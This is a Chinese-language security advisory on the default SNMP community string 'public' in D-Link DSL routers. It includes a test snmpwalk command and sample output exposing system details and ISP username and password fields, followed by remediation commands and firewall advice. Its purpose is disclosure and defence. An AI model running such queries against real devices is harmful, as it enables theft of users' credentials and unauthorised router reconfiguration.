D-Link DSL Router SNMP默认共同体串漏洞发布时间:2003-03-27 更新时间:2003-03-31 严重程度:高 威胁程度:服务器信息泄露 错误类型:环境错误 利用方式:服务器模式 BUGTRAQ ID:7212 受影响系统 D-Link DSL-300 1.14详细描述 D-Link路由器存在默认可预见的SNMP共同体串。 设备默认启用SNMP功能,远程攻击者可以利用这个漏洞获取非授权的敏感信息甚至修改配置。 测试代码 Arhont Information Security (infosec@arhont.com)提供了如下测试方法: andrei@whale:~/bugtraq/DSL-modems$ snmpwalk -Os -c public 192.168.0.1 -v 1 sysDescr.0 = STRING: D-Link DSL-500 version 7.1.0.30 Annex-A (Nov 28 2002) R2.21.002.04.b2t18uk Copyright (c) 2000 Dlink Corp. sysObjectID.0 = OID: enterprises.171.10.30.1 sysUpTime.0 = Timeticks: (14246347) 1 day, 15:34:23.47 ... andrei@whale:~/bugtraq/DSL-modems$ snmpwalk -Os -c public 192.168.0.1 -v 1 sysDescr.0 = STRING: D-Link DSL-500 version 7.1.0.30 Annex-A (Nov 28 2002) R2.21.002.04.b2t18uk ... ... ... transmission.23.2.3.1.5.2.1 = STRING: "username@dsl-provider" ... ... transmission.23.2.3.1.6.2.1 = STRING: "password-string" ... ... 解决方案 snmp access flush # Flushes all access strings snmp access read <password> # Sets your RO community password snmp access write <password> # Sets your R/W community password # NOTE: This is also your telnet # password! Make sure it is kept # safe! snmp access list # Always good to check ;) config save # Saves configuration restart # Restarts router. 使用防火墙限制不可信主机访问设备的UDP 161端口。 相关信息 报告:Arhont Information Security <infosec@arhont.com> 相关资料:http://online.securityfocus.com/archive/1/316670 http://online.securityfocus.com/archive/1/316489 |
